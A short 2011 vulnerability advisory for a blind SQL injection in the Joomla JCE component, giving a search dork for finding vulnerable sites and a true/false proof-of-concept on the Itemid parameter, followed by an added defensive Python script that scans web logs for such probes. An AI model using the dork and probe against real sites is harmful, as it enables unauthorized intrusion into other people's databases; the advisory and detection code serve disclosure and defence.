Blind SQL injection vulnerability

Posted: April 11, 2011 in Analysis, cracking


joomlacontenteditor (com_jce) Blind SQL injection vulnerability


Software: joomlacontenteditor (com_jce)


Vuln Type: Blind SQL Injection

Download link:
oomla-15-2 (check here)

Author: eidelweiss

contact: eidelweiss[at]windowslive[dot]com


Dork: inurl:”/index.php?option=com_jce”




JCE makes creating and editing Joomla!® content easy. Add a set of tools to your Joomla!® environment that give you the power to create the kind of content you want, without limitations, and without needing to know or learn HTML, XHTML, CSS…


exploit & p0c

[!] index.php?option=com_jce&Itemid=[valid Itemid]

Example p0c

[!] http://host/index.php?option=com_jce&Itemid=8 <= True

[!] http://host/index.php?option=com_jce&Itemid=-8 <= False


Nothing Impossible In This World Even Nobody`s Perfect
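
For defenders, the true/false behaviour on Itemid shown above can be hunted for in web server logs. The following is an added example, not part of the original advisory: it flags com_jce requests whose Itemid is not a plain positive integer. The log lines are constructed, and the rule that a legitimate Itemid is a positive integer is an assumption of this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (common log format), not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [11/Apr/2011:10:00:01 +0000] "GET /index.php?option=com_jce&Itemid=8 HTTP/1.1" 200 5120
198.51.100.7 - - [11/Apr/2011:10:00:02 +0000] "GET /index.php?option=com_jce&Itemid=-8 HTTP/1.1" 200 312
203.0.113.9 - - [11/Apr/2011:10:00:05 +0000] "GET /index.php?option=com_content&Itemid=3 HTTP/1.1" 200 4096
198.51.100.7 - - [11/Apr/2011:10:00:09 +0000] "GET /index.php?Itemid=8%20x&option=com_jce HTTP/1.1" 200 5120
203.0.113.9 - - [11/Apr/2011:10:00:12 +0000] "GET /index.php?option=com_jce HTTP/1.1" 200 2048
"""

# Client address is the first field; the request line sits inside double quotes.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"'
)
# Assumption: a legitimate menu Itemid is a positive integer and nothing else.
STRICT_ID = re.compile(r"[1-9][0-9]*")


def suspicious_itemid(target):
    """Return the Itemid values of a com_jce request that are not positive integers."""
    # parse_qs URL-decodes values, so encoded characters are checked in clear form.
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if "com_jce" not in query.get("option", []):
        return []
    return [v for v in query.get("Itemid", []) if not STRICT_ID.fullmatch(v)]


def scan(log_text):
    """Return (client_ip, offending_values) for every flagged log line."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue  # not a request line this parser understands
        bad = suspicious_itemid(match.group("target"))
        if bad:
            hits.append((match.group("ip"), bad))
    return hits


if __name__ == "__main__":
    for ip, bad in scan(SAMPLE_LOG):
        print(f"{ip} sent com_jce Itemid value(s) {bad!r}")
```

A hit is a lead for review rather than proof of exploitation; repeated hits from one client with varying Itemid values are the pattern worth escalating.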


